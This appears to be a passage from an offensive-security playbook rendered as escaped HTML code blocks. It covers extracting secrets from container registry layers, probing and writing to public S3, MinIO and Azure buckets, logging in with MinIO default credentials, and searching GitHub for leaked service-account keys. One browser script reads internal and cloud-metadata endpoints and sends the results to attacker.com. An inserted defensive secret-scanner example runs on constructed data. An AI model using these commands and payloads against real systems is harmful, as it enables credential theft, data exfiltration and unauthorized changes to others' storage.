&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; i, layer &lt;span style="color:#99d1db;font-weight:bold"&gt;in&lt;/span&gt; &lt;span style="color:#99d1db"&gt;enumerate&lt;/span&gt;(r&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;json()&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(&lt;span style="color:#a6d189"&gt;&amp;#39;layers&amp;#39;&lt;/span&gt;, [])):
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; r2 &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; requests&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;get(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;https://&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;region&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;-docker.pkg.dev/v2/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;project&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;repo&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;image&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;/blobs/&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;layer[&lt;span style="color:#a6d189"&gt;&amp;#34;digest&amp;#34;&lt;/span&gt;]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; headers&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;{&lt;span style="color:#a6d189"&gt;&amp;#39;Authorization&amp;#39;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;Bearer &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;token&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; )
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;with&lt;/span&gt; &lt;span style="color:#99d1db"&gt;open&lt;/span&gt;(&lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#39;/tmp/layer_&lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;i&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.tar.gz&amp;#39;&lt;/span&gt;, &lt;span style="color:#a6d189"&gt;&amp;#39;wb&amp;#39;&lt;/span&gt;) &lt;span style="color:#ca9ee6"&gt;as&lt;/span&gt; f:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; f&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;write(r2&lt;span style="color:#99d1db;font-weight:bold"&gt;.&lt;/span&gt;content)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Extract and search for secrets&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# tar -xzf layer.tar.gz&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# grep -r &amp;#34;MIGRATION_TOKEN\|APP_KEY\|DB_PASSWORD\|secret\|password&amp;#34; . --include=&amp;#34;*.js&amp;#34; --include=&amp;#34;*.ts&amp;#34; --include=&amp;#34;*.json&amp;#34; --include=&amp;#34;.env&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
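The extract-and-grep step above, as an added example that is not the playbook's code: a Python scanner that walks a gzip-compressed layer tarball in memory and reports secret-looking content together with the file path, so it can run as a CI gate before an image is pushed to the registry. The patterns extend the playbook's grep terms (assumed shapes), and the layer tarball is constructed inline.

```python
"""Scan container image layers for leaked secrets before they reach a registry.

Added example, not from the playbook. Every gzip-compressed layer is walked in
memory, text files with config or source suffixes are matched against a few
secret patterns, and each finding carries the path so the offending build step
can be located. Matches are redacted in the report so the scanner itself does
not become a second place where the secret is written down.
"""
import io
import re
import tarfile

# Names from the playbook's grep plus a few generic shapes (assumed patterns)
SECRET_PATTERNS = {
    "env_assignment": re.compile(
        r"^\s*(MIGRATION_TOKEN|APP_KEY|DB_PASSWORD|[A-Z0-9_]*(SECRET|PASSWORD|TOKEN)[A-Z0-9_]*)\s*=\s*(\S+)",
        re.M,
    ),
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
    "json_secret": re.compile(r'"(secret|password|token|apiKey)"\s*:\s*"([^"]+)"', re.I),
}
INTERESTING_SUFFIXES = (".js", ".ts", ".json", ".env", ".yml", ".yaml", ".py", ".pem")
MAX_FILE_BYTES = 2_000_000  # skip huge bundles and blobs to keep the scan cheap


def _worth_scanning(member):
    name = member.name.rsplit("/", 1)[-1]
    # regular file, within the size cap, and a suffix that usually holds config or code
    within_cap = min(member.size, MAX_FILE_BYTES) == member.size
    return member.isfile() and within_cap and name.endswith(INTERESTING_SUFFIXES)


def _redact(s):
    """Keep enough of a match to locate it in the file, never the whole secret."""
    return s if min(len(s), 12) == len(s) else s[:8] + "..." + s[-4:]


def scan_layer(layer_bytes):
    """Return [(path, pattern_name, redacted_match)] for one gzip-compressed layer tarball."""
    findings = []
    with tarfile.open(fileobj=io.BytesIO(layer_bytes), mode="r:gz") as tar:
        for member in tar:
            if not _worth_scanning(member):
                continue
            data = tar.extractfile(member).read()
            try:
                text = data.decode("utf-8")
            except UnicodeDecodeError:
                continue  # binary content, not a config or source file
            for name, pattern in SECRET_PATTERNS.items():
                for m in pattern.finditer(text):
                    findings.append((member.name, name, _redact(m.group(0))))
    return findings


def build_layer(files):
    """Constructed test layer: {path: text or bytes} packed into a gzip tarball in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        for path, content in files.items():
            data = content if isinstance(content, bytes) else content.encode()
            info = tarfile.TarInfo(name=path)
            info.size = len(data)
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


# Constructed layer: a .env with two leaked values, a JSON config with an API key,
# a clean JS file and a .json that is really binary junk (exercises the decode guard)
SAMPLE_LAYER = build_layer({
    "app/.env": "APP_KEY=base64:constructedExampleKeyValue0000\nDB_PASSWORD=not-a-real-password\nPORT=3000\n",
    "app/config.json": '{"apiKey": "constructed-json-secret-123"}',
    "app/dist/main.js": "console.log('hello');",
    "app/blob.json": b"\xff\xfe\x00junk",
})

if __name__ == "__main__":
    for path, kind, snippet in scan_layer(SAMPLE_LAYER):
        print(f"{path}: {kind}: {snippet}")
```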
&lt;h2 id="13-s3--minio--blob-storage" &gt;
&lt;div&gt;
&lt;a href="#13-s3--minio--blob-storage"&gt;
#
&lt;/a&gt;
13. S3 / MINIO / BLOB STORAGE
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="131-s3--aws" &gt;
&lt;div&gt;
&lt;a href="#131-s3--aws"&gt;
##
&lt;/a&gt;
13.1 S3 — AWS
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test if bucket is public&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://bucket-name.s3.amazonaws.com/&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# If XML with &amp;lt;ListBucketResult&amp;gt; is returned → PUBLIC LISTING&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Upload (if writable)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PUT &lt;span style="color:#a6d189"&gt;&amp;#34;http://bucket-name.s3.amazonaws.com/test.txt&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/plain&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;pwned&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test common bucket names&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;buckets&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=(&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;target&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-prod&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-dev&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-images&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-uploads&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-backup&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;target-media&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;download.target.com&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;static.target.com&amp;#34;&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; b in &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#a6d189"&gt;${&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;buckets&lt;/span&gt;[@]&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;do&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#f2d5cf"&gt;r&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;curl -sk -o /dev/null -w &lt;span style="color:#a6d189"&gt;&amp;#34;%{http_code}&amp;#34;&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$b&lt;/span&gt;&lt;span style="color:#a6d189"&gt;.s3.amazonaws.com/&amp;#34;&lt;/span&gt; 2&amp;gt;/dev/null&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;if&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;[&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt; !&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;404&amp;#34;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;]&lt;/span&gt;; &lt;span style="color:#ca9ee6"&gt;then&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#99d1db"&gt;echo&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$b&lt;/span&gt;&lt;span style="color:#a6d189"&gt; -&amp;gt; HTTP &lt;/span&gt;&lt;span style="color:#f2d5cf"&gt;$r&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;fi&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;done&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="132-minio-s3-compatible-common-on-vps" &gt;
&lt;div&gt;
&lt;a href="#132-minio-s3-compatible-common-on-vps"&gt;
##
&lt;/a&gt;
13.2 MinIO (S3-compatible, common on VPS)
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Health check&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -sI &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9000/minio/health/live&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Admin API (versions v1, v3)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9000/minio/admin/v3/info&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Web console login (port 9001)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9001/api/v1/login&amp;#34;&lt;/span&gt; &lt;span style="color:#737994;font-style:italic"&gt;# GET → {&amp;#34;loginStrategy&amp;#34;:&amp;#34;form&amp;#34;}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9001/api/v1/login&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#39;{&amp;#34;accessKey&amp;#34;:&amp;#34;minioadmin&amp;#34;,&amp;#34;secretKey&amp;#34;:&amp;#34;minioadmin&amp;#34;}&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# List bucket objects&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9000/bucket-name?list-type=2&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Upload&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X PUT &lt;span style="color:#a6d189"&gt;&amp;#34;http://host:9000/bucket-name/file.html&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -H &lt;span style="color:#a6d189"&gt;&amp;#34;Content-Type: text/html; charset=utf-8&amp;#34;&lt;/span&gt; &lt;span style="color:#8caaee"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; -d &lt;span style="color:#a6d189"&gt;&amp;#34;&amp;lt;h1&amp;gt;Pwned&amp;lt;/h1&amp;gt;&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="133-azure-blob-storage" &gt;
&lt;div&gt;
&lt;a href="#133-azure-blob-storage"&gt;
##
&lt;/a&gt;
13.3 Azure Blob Storage
&lt;/div&gt;
&lt;/h3&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# URL pattern&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# https://{storage_account}.blob.core.windows.net/{container}&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Test public listing&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -s &lt;span style="color:#a6d189"&gt;&amp;#34;https://storageaccount.blob.core.windows.net/container?restype=container&amp;amp;comp=list&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="134-ssrf-via-public-buckets" &gt;
&lt;div&gt;
&lt;a href="#134-ssrf-via-public-buckets"&gt;
##
&lt;/a&gt;
13.4 SSRF via Public Buckets
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;If a bucket is publicly writable and serves the uploaded object with &lt;code&gt;Content-Type: text/html&lt;/code&gt; (as in the MinIO upload above), whoever opens the object runs attacker JavaScript in the bucket's origin. The playbook files this under SSRF, but the requests are made by the victim's browser, not by a server: they reach whatever the victim's network can reach, and the response body is only readable when the internal service answers with permissive CORS headers.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-html" data-lang="html"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;&lt;span style="color:#ca9ee6"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;// SSRF via victim&amp;#39;s browser
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ca9ee6"&gt;async&lt;/span&gt; &lt;span style="color:#e78284"&gt;function&lt;/span&gt; ssrf() {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;let&lt;/span&gt; targets &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;http://localhost:8080/actuator/env&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;http://127.0.0.1:9200/&amp;#39;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;http://169.254.169.254/latest/meta-data/&amp;#39;&lt;/span&gt;, &lt;span style="color:#737994;font-style:italic"&gt;// AWS metadata
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ];
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;for&lt;/span&gt; (&lt;span style="color:#e78284"&gt;let&lt;/span&gt; url &lt;span style="color:#ca9ee6"&gt;of&lt;/span&gt; targets) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;try&lt;/span&gt; {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;let&lt;/span&gt; r &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; fetch(url);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#e78284"&gt;let&lt;/span&gt; data &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ca9ee6"&gt;await&lt;/span&gt; r.text();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#ca9ee6"&gt;new&lt;/span&gt; Image().src &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#39;https://attacker.com/exfil?data=&amp;#39;&lt;/span&gt; &lt;span style="color:#99d1db;font-weight:bold"&gt;+&lt;/span&gt; &lt;span style="color:#99d1db"&gt;encodeURIComponent&lt;/span&gt;(data);
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; } &lt;span style="color:#ca9ee6"&gt;catch&lt;/span&gt;(e) {}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;ssrf();
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&amp;lt;/&lt;span style="color:#ca9ee6"&gt;script&lt;/span&gt;&amp;gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;hr&gt;
&lt;h2 id="14-code-leaks--github-gitlab-docker-hub-npm" &gt;
&lt;div&gt;
&lt;a href="#14-code-leaks--github-gitlab-docker-hub-npm"&gt;
#
&lt;/a&gt;
14. CODE LEAKS — GITHUB, GITLAB, DOCKER HUB, NPM
&lt;/div&gt;
&lt;/h2&gt;
&lt;h3 id="141-github-code-search--the-most-effective-tool" &gt;
&lt;div&gt;
&lt;a href="#141-github-code-search--the-most-effective-tool"&gt;
##
&lt;/a&gt;
14.1 GitHub Code Search — The Most Effective Tool
&lt;/div&gt;
&lt;/h3&gt;
&lt;p&gt;&lt;strong&gt;With personal token&lt;/strong&gt; (the REST code search endpoint rejects unauthenticated requests, and results are much better than anonymous web search):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# Setup&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;gh auth login
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f2d5cf"&gt;GH_TOKEN&lt;/span&gt;&lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#ca9ee6"&gt;$(&lt;/span&gt;gh auth token&lt;span style="color:#ca9ee6"&gt;)&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h4 id="search-patterns-that-work" &gt;
&lt;div&gt;
&lt;a href="#search-patterns-that-work"&gt;
###
&lt;/a&gt;
Search Patterns That Work
&lt;/div&gt;
&lt;/h4&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#c6d0f5;background-color:#303446;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;headers &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;Authorization&amp;#34;&lt;/span&gt;: &lt;span style="color:#e78284"&gt;f&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;token &lt;/span&gt;&lt;span style="color:#a6d189"&gt;{&lt;/span&gt;GH_TOKEN&lt;span style="color:#a6d189"&gt;}&lt;/span&gt;&lt;span style="color:#a6d189"&gt;&amp;#34;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;base &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a6d189"&gt;&amp;#34;https://api.github.com/search/code&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# SA Keys (Firebase/GCP) — ~1 in 30 is valid&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;params &lt;span style="color:#99d1db;font-weight:bold"&gt;=&lt;/span&gt; {&lt;span style="color:#a6d189"&gt;&amp;#34;q&amp;#34;&lt;/span&gt;: &lt;span style="color:#a6d189"&gt;&amp;#39;&amp;#34;type&amp;#34;: &amp;#34;service_account&amp;#34; &amp;#34;private_key&amp;#34; &amp;#34;project_id&amp;#34;&amp;#39;&lt;/span&gt;}
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#737994;font-style:italic"&gt;# .env with real credentials&lt;/span&gt;
